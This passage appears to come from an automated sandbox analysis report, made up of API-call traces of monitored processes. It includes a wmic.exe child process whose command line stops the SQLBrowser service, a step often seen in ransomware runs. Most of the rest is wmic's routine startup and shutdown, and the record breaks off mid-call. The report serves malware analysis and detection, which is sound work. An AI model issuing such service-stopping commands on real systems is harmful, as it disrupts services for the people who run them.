WbemLocator:IUnknown:Release (This=0x5348d0) returned 0x2 [0277.177] WbemLocator:IUnknown:Release (This=0x53b180) returned 0x0 [0277.178] WbemLocator:IUnknown:Release (This=0x5348d0) returned 0x1 [0277.178] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0277.178] WbemLocator:IUnknown:Release (This=0x5348d0) returned 0x0 [0277.178] free (_Block=0x79ab70) [0277.178] free (_Block=0x79ac30) [0277.178] free (_Block=0x792a00) [0277.178] free (_Block=0x79ac60) [0277.178] free (_Block=0x79ab88) [0277.178] free (_Block=0x7929a0) [0277.178] free (_Block=0x79ab10) [0277.178] free (_Block=0x79ad98) [0277.178] free (_Block=0x792ca0) [0277.178] free (_Block=0x79acc0) [0277.178] free (_Block=0x79ab40) [0277.178] free (_Block=0x792cc0) [0277.178] free (_Block=0x79ab28) [0277.179] free (_Block=0x79ad38) [0277.179] free (_Block=0x792b20) [0277.179] free (_Block=0x79ad20) [0277.179] free (_Block=0x79adf8) [0277.179] free (_Block=0x7929e0) [0277.179] free (_Block=0x79acf0) [0277.179] free (_Block=0x79ab58) [0277.179] free (_Block=0x792a20) [0277.179] free (_Block=0x79ade0) [0277.179] free (_Block=0x79abd0) [0277.179] free (_Block=0x792d60) [0277.179] free (_Block=0x799928) [0277.179] free (_Block=0x79ac48) [0277.179] free (_Block=0x792ac0) [0277.179] free (_Block=0x79ac90) [0277.179] free (_Block=0x79ac78) [0277.179] free (_Block=0x792be0) [0277.179] free (_Block=0x79adb0) [0277.179] free (_Block=0x79acd8) [0277.180] free (_Block=0x792d20) [0277.180] free (_Block=0x79ad08) [0277.180] free (_Block=0x79adc8) [0277.180] free (_Block=0x792d40) [0277.180] free (_Block=0x799898) [0277.180] free (_Block=0x7998b0) [0277.180] free (_Block=0x792ba0) [0277.180] free (_Block=0x7997f0) [0277.180] free (_Block=0x799970) [0277.180] free (_Block=0x792c40) [0277.180] free (_Block=0x799988) [0277.180] free (_Block=0x7999a0) [0277.180] free (_Block=0x792a60) [0277.180] free (_Block=0x799808) [0277.180] free (_Block=0x799838) [0277.180] free (_Block=0x792a80) [0277.180] free (_Block=0x7998c8) [0277.181] free (_Block=0x7998e0) [0277.181] free (_Block=0x792bc0) [0277.181] free (_Block=0x7999b8) [0277.181] free (_Block=0x7998f8) [0277.181] free (_Block=0x792c60) [0277.181] free (_Block=0x799820) [0277.181] free (_Block=0x799850) [0277.181] free (_Block=0x792c80) [0277.181] free (_Block=0x799868) [0277.181] free (_Block=0x799880) [0277.181] free (_Block=0x792aa0) [0277.181] free (_Block=0x799910) [0277.181] free (_Block=0x799958) [0277.181] free (_Block=0x792d00) [0277.181] CoUninitialize () [0277.221] exit (_Code=0) [0277.222] free (_Block=0x79aee8) [0277.222] free (_Block=0x791008) [0277.222] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0277.222] free (_Block=0x792e10) [0277.222] free (_Block=0x7927e0) [0277.222] free (_Block=0x790fe8) [0277.222] free (_Block=0x790fc8) [0277.222] free (_Block=0x790f98) [0277.222] free (_Block=0x790f78) [0277.222] free (_Block=0x790f48) [0277.222] free (_Block=0x790f08) [0277.222] free (_Block=0x790ee8) [0277.222] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0277.222] free (_Block=0x792a40) Thread: id = 225 os_tid = 0x1100 Thread: id = 226 os_tid = 0x13f8 Thread: id = 227 os_tid = 0x13fc Thread: id = 228 os_tid = 0x1288 Process: id = "17" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x4ff02000" os_pid = "0x8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 232 os_tid = 0x518 [0277.511] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0277.511] __set_app_type (_Type=0x1) [0277.511] __p__fmode () returned 0x776f3c14 [0277.511] __p__commode () returned 0x776f49ec [0277.511] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0277.511] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0277.512] ??0CHString@@QAE@XZ () returned 0xa685ec [0277.512] malloc (_Size=0x18) returned 0x860ee8 [0277.512] malloc (_Size=0x38) returned 0x860f08 [0277.512] malloc (_Size=0x28) returned 0x860f48 [0277.512] malloc (_Size=0x18) returned 0x860f78 [0277.512] malloc (_Size=0x24) returned 0x860f98 [0277.512] malloc (_Size=0x18) returned 0x860fc8 [0277.512] malloc (_Size=0x18) returned 0x860fe8 [0277.512] ??0CHString@@QAE@XZ () returned 0xa688fc [0277.512] malloc (_Size=0x18) returned 0x861008 [0277.512] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0277.513] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0277.513] _onexit (_Func=0xa5f370) returned 0xa5f370 [0277.513] _onexit (_Func=0xa5f380) returned 0xa5f380 [0277.513] _onexit (_Func=0xa5f390) returned 0xa5f390 [0277.513] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0277.513] ResolveDelayLoadedAPI () returned 0x74a22590 [0277.514] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0277.520] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0277.530] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x8b4920) returned 0x0 [0277.574] GetCurrentProcess () returned 0xffffffff [0277.574] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x35fdd4 | out: TokenHandle=0x35fdd4*=0x194) returned 1 [0277.574] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x35fdd0 | out: TokenInformation=0x0, ReturnLength=0x35fdd0) returned 0 [0277.574] malloc (_Size=0x118) returned 0x8626b0 [0277.574] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x8626b0, TokenInformationLength=0x118, ReturnLength=0x35fdd0 | out: TokenInformation=0x8626b0, ReturnLength=0x35fdd0) returned 1 [0277.574] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x8626b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0277.574] free (_Block=0x8626b0) [0277.575] CloseHandle (hObject=0x194) returned 1 [0277.575] malloc (_Size=0x40) returned 0x8626b0 [0277.575] malloc (_Size=0x40) returned 0x8626f8 [0277.575] malloc (_Size=0x40) returned 0x862740 [0277.575] SetThreadUILanguage (LangId=0x0) returned 0x480409 [0277.580] _vsnwprintf (in: _Buffer=0x862740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x35fd5c | out: _Buffer="ms_409") returned 6 [0277.580] malloc (_Size=0x20) returned 0x861200 [0277.580] GetComputerNameW (in: lpBuffer=0x861200, nSize=0x35fdc0 | out: lpBuffer="NQDPDE", nSize=0x35fdc0) returned 1 [0277.580] lstrlenW (lpString="NQDPDE") returned 6 [0277.581] malloc (_Size=0xe) returned 0x862788 [0277.581] lstrlenW (lpString="NQDPDE") returned 6 [0277.581] ResolveDelayLoadedAPI () returned 0x7444db00 [0277.581] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x35fdd4 | out: lpNameBuffer=0x0, nSize=0x35fdd4) returned 0x48d000 [0277.585] GetLastError () returned 0xea [0277.585] malloc (_Size=0x1e) returned 0x8627a0 [0277.585] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x8627a0, nSize=0x35fdd4 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x35fdd4) returned 0x1 [0277.586] lstrlenW (lpString="") returned 0 [0277.586] lstrlenW (lpString="NQDPDE") returned 6 [0277.586] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0277.590] lstrlenW (lpString=".") returned 1 [0277.590] lstrlenW (lpString="NQDPDE") returned 6 [0277.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0277.590] lstrlenW (lpString="LOCALHOST") returned 9 [0277.590] lstrlenW (lpString="NQDPDE") returned 6 [0277.590] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0277.590] lstrlenW (lpString="NQDPDE") returned 6 [0277.590] lstrlenW (lpString="NQDPDE") returned 6 [0277.591] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0277.591] free (_Block=0x862788) [0277.591] lstrlenW (lpString="NQDPDE") returned 6 [0277.591] malloc (_Size=0xe) returned 0x862788 [0277.591] lstrlenW (lpString="NQDPDE") returned 6 [0277.591] lstrlenW (lpString="NQDPDE") returned 6 [0277.591] malloc (_Size=0xe) returned 0x8627c8 [0277.591] lstrlenW (lpString="NQDPDE") returned 6 [0277.591] malloc (_Size=0x4) returned 0x8627e0 [0277.591] malloc (_Size=0xc) returned 0x8627f0 [0277.591] ResolveDelayLoadedAPI () returned 0x7745b870 [0277.603] malloc (_Size=0x18) returned 0x862808 [0277.603] malloc (_Size=0xc) returned 0x862828 [0277.603] SysStringLen (param_1="IDENTIFY") returned 0x8 [0277.603] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0277.603] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0277.603] SysStringLen (param_1="IDENTIFY") returned 0x8 [0277.603] malloc (_Size=0x18) returned 0x862840 [0277.603] malloc (_Size=0xc) returned 0x862860 [0277.603] SysStringLen (param_1="IMPERSONATE") returned 0xb [0277.603] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0277.603] SysStringLen (param_1="IMPERSONATE") returned 0xb [0277.603] SysStringLen (param_1="IDENTIFY") returned 0x8 [0277.603] SysStringLen (param_1="IDENTIFY") returned 0x8 [0277.603] SysStringLen (param_1="IMPERSONATE") returned 0xb [0277.603] malloc (_Size=0x18) returned 0x862878 [0277.603] malloc (_Size=0xc) returned 0x862898 [0277.603] SysStringLen (param_1="DELEGATE") returned 0x8 [0277.604] SysStringLen (param_1="IDENTIFY") returned 0x8 [0277.604] SysStringLen (param_1="DELEGATE") returned 0x8 [0277.604] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0277.604] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0277.604] SysStringLen (param_1="DELEGATE") returned 0x8 [0277.604] malloc (_Size=0x18) returned 0x8628b0 [0277.604] malloc (_Size=0xc) returned 0x8628d0 [0277.604] malloc (_Size=0x18) returned 0x8628e8 [0277.604] malloc (_Size=0xc) returned 0x862908 [0277.604] SysStringLen (param_1="NONE") returned 0x4 [0277.604] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.604] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.604] SysStringLen (param_1="NONE") returned 0x4 [0277.604] malloc (_Size=0x18) returned 0x862920 [0277.604] malloc (_Size=0xc) returned 0x862940 [0277.604] SysStringLen (param_1="CONNECT") returned 0x7 [0277.604] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.604] malloc (_Size=0x18) returned 0x862958 [0277.604] malloc (_Size=0xc) returned 0x8604a0 [0277.605] SysStringLen (param_1="CALL") returned 0x4 [0277.605] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.605] SysStringLen (param_1="CALL") returned 0x4 [0277.605] SysStringLen (param_1="CONNECT") returned 0x7 [0277.605] malloc (_Size=0x18) returned 0x8604b8 [0277.605] malloc (_Size=0xc) returned 0x8604d8 [0277.605] SysStringLen (param_1="PKT") returned 0x3 [0277.605] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.605] SysStringLen (param_1="PKT") returned 0x3 [0277.605] SysStringLen (param_1="NONE") returned 0x4 [0277.605] SysStringLen (param_1="NONE") returned 0x4 [0277.605] SysStringLen (param_1="PKT") returned 0x3 [0277.605] malloc (_Size=0x18) returned 0x8629c0 [0277.605] malloc (_Size=0xc) returned 0x8604f0 [0277.605] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0277.605] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.605] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0277.605] SysStringLen (param_1="NONE") returned 0x4 [0277.605] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0277.605] SysStringLen (param_1="PKT") returned 0x3 [0277.605] SysStringLen (param_1="PKT") returned 0x3 [0277.605] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0277.605] malloc (_Size=0x18) returned 0x862b40 [0277.605] malloc (_Size=0xc) returned 0x860508 [0277.605] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0277.605] SysStringLen (param_1="DEFAULT") returned 0x7 [0277.605] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0277.605] SysStringLen (param_1="PKT") returned 0x3 [0277.605] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0277.605] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0277.605] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0277.606] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0277.606] malloc (_Size=0x18) returned 0x862ca0 [0277.606] malloc (_Size=0x40) returned 0x860520 [0277.606] malloc (_Size=0x20a) returned 0x8697c8 [0277.606] GetSystemDirectoryW (in: lpBuffer=0x8697c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0277.606] free (_Block=0x8697c8) [0277.606] malloc (_Size=0xc) returned 0x860568 [0277.606] malloc (_Size=0xc) returned 0x860580 [0277.606] malloc (_Size=0xc) returned 0x862d80 [0277.606] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0277.606] SysStringLen (param_1="\\wbem\\") returned 0x6 [0277.606] free (_Block=0x860568) [0277.606] free (_Block=0x860580) [0277.606] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0277.606] free (_Block=0x862d80) [0277.606] malloc (_Size=0xc) returned 0x8699a0 [0277.606] malloc (_Size=0xc) returned 0x8699b8 [0277.606] malloc (_Size=0xc) returned 0x8698e0 [0277.606] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0277.607] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0277.607] free (_Block=0x8699a0) [0277.607] free (_Block=0x8699b8) [0277.607] GetCurrentThreadId () returned 0x518 [0277.607] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x35f8e4 | out: phkResult=0x35f8e4*=0x1a0) returned 0x0 [0277.607] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x35f8f0, lpcbData=0x35f8ec*=0x400 | out: lpType=0x0, lpData=0x35f8f0*=0x30, lpcbData=0x35f8ec*=0x4) returned 0x0 [0277.607] _wcsicmp (_String1="0", _String2="1") returned -1 [0277.607] _wcsicmp (_String1="0", _String2="2") returned -2 [0277.607] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x35f8ec*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x35f8ec*=0x42) returned 0x0 [0277.607] malloc (_Size=0x86) returned 0x862d80 [0277.607] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x862d80, lpcbData=0x35f8ec*=0x42 | out: lpType=0x0, lpData=0x862d80*=0x25, lpcbData=0x35f8ec*=0x42) returned 0x0 [0277.607] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0277.607] malloc (_Size=0x42) returned 0x862e10 [0277.607] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0277.607] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x35f8f0, lpcbData=0x35f8ec*=0x400 | out: lpType=0x0, lpData=0x35f8f0*=0x36, lpcbData=0x35f8ec*=0xc) returned 0x0 [0277.607] _wtol (_String="65536") returned 65536 [0277.607] free (_Block=0x862d80) [0277.607] RegCloseKey (hKey=0x0) returned 0x6 [0277.607] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x35fd80 | out: ppv=0x35fd80*=0x7b45a8) returned 0x0 [0277.629] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x7b45a8, xmlSource=0x35fd04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x35fd6c | out: isSuccessful=0x35fd6c*=0xffff) returned 0x0 [0277.952] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x7b45a8, DOMElement=0x35fd7c | out: DOMElement=0x35fd7c*=0x7b6b48) returned 0x0 [0277.953] malloc (_Size=0xc) returned 0x8697f0 [0277.953] IXMLDOMElement:getElementsByTagName (in: This=0x7b6b48, tagName="XSLFORMAT", resultList=0x35fd78 | out: resultList=0x35fd78*=0x7b9ca0) returned 0x0 [0277.955] free (_Block=0x8697f0) [0277.955] IXMLDOMNodeList:get_length (in: This=0x7b9ca0, listLength=0x35fd74 | out: listLength=0x35fd74*=21) returned 0x0 [0277.955] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=0, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.956] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.956] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.957] malloc (_Size=0xc) returned 0x869868 [0277.957] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.957] free (_Block=0x869868) [0277.957] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0277.957] malloc (_Size=0xc) returned 0x869880 [0277.957] malloc (_Size=0xc) returned 0x8699b8 [0277.957] malloc (_Size=0x18) returned 0x862a00 [0277.957] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.958] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.958] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.958] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=1, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.958] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="textvaluelist.xsl") returned 0x0 [0277.958] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.958] malloc (_Size=0xc) returned 0x8698f8 [0277.958] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.959] free (_Block=0x8698f8) [0277.959] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0277.959] malloc (_Size=0xc) returned 0x869928 [0277.959] malloc (_Size=0xc) returned 0x869898 [0277.959] SysStringLen (param_1="VALUE") returned 0x5 [0277.959] SysStringLen (param_1="TABLE") returned 0x5 [0277.959] SysStringLen (param_1="TABLE") returned 0x5 [0277.959] SysStringLen (param_1="VALUE") returned 0x5 [0277.959] malloc (_Size=0x18) returned 0x862aa0 [0277.959] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.959] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.960] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.960] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=2, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.960] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="textvaluelist.xsl") returned 0x0 [0277.960] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.960] malloc (_Size=0xc) returned 0x869820 [0277.960] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.960] free (_Block=0x869820) [0277.961] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0277.961] malloc (_Size=0xc) returned 0x8698b0 [0277.961] malloc (_Size=0xc) returned 0x869850 [0277.961] SysStringLen (param_1="LIST") returned 0x4 [0277.961] SysStringLen (param_1="TABLE") returned 0x5 [0277.961] malloc (_Size=0x18) returned 0x862bc0 [0277.961] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.961] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.961] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.961] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=3, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.962] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="rawxml.xsl") returned 0x0 [0277.962] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.962] malloc (_Size=0xc) returned 0x869958 [0277.962] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.962] free (_Block=0x869958) [0277.962] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0277.962] malloc (_Size=0xc) returned 0x8699a0 [0277.962] malloc (_Size=0xc) returned 0x8698c8 [0277.962] SysStringLen (param_1="RAWXML") returned 0x6 [0277.963] SysStringLen (param_1="TABLE") returned 0x5 [0277.963] SysStringLen (param_1="RAWXML") returned 0x6 [0277.963] SysStringLen (param_1="LIST") returned 0x4 [0277.963] SysStringLen (param_1="LIST") returned 0x4 [0277.963] SysStringLen (param_1="RAWXML") returned 0x6 [0277.963] malloc (_Size=0x18) returned 0x862c20 [0277.963] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.963] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.963] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.963] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=4, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.963] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="htable.xsl") returned 0x0 [0277.964] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.964] malloc (_Size=0xc) returned 0x8697f0 [0277.964] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.964] free (_Block=0x8697f0) [0277.964] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0277.964] malloc (_Size=0xc) returned 0x869958 [0277.964] malloc (_Size=0xc) returned 0x8698f8 [0277.964] SysStringLen (param_1="HTABLE") returned 0x6 [0277.964] SysStringLen (param_1="TABLE") returned 0x5 [0277.964] SysStringLen (param_1="HTABLE") returned 0x6 [0277.965] SysStringLen (param_1="LIST") returned 0x4 [0277.965] malloc (_Size=0x18) returned 0x862be0 [0277.965] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.965] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.965] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.965] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=5, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.965] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="hform.xsl") returned 0x0 [0277.965] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.965] malloc (_Size=0xc) returned 0x869970 [0277.966] IXMLDOMNamedNodeMap:getNamedItem (in: 